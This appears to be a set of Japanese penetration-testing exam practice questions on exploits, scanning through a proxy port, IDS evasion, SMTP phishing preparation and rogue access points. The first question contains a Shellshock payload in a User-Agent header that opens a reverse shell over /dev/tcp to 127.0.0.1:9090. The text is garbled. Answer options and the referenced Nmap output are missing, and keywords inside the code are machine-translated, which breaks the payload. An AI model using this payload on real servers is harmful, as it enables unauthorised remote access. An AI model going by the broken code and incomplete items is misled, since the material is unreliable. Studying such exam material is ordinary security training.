ペネトレーション テスターが 10.10.1.1 で脆弱な Web サーバーを発見しました。次に、テスターは Web エクスプロイトを送信する Python スクリプトを編集し、次のコードを見つけます。
エクスプロイト = {"ユーザー エージェント": "() { 無視されました;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application /xhtml+xml,application/xml"} サーバーが実行されているユーザー コンテキストを判断するには、テスターがスクリプトに対して次の編集のうちどれを行う必要がありますか?

ペネトレーション テスターはターゲットに対して Nmap スキャンを実行し、次の結果を受け取ります。

テスターがターゲット上の TCP ポート 1080 を使用してスキャン ツールをリダイレクトするには、次のどれを使用する必要がありますか?

ペネトレーション テスターは、クライアントの IDS に検出されずにターゲット ネットワークをスキャンしたいと考えています。次のスキャンのうち、検出を回避できる可能性が最も高いのはどれですか?

アクティブなサービスの列挙のプロセスで、ペネトレーション テスターは、ターゲット企業のサーバーの 1 つで実行されている SMTP デーモンを特定します。次のアクションのうち、テスト担当者が評価の後の段階でフィッシングを実行できるようにするのに最も適したアクションはどれですか?

ある企業は、ネットワーク上に不正なアクセス ポイントを展開して設定するために侵入テスターを雇いました。
この目標を達成するために使用するのに最適なツールは次のうちどれですか?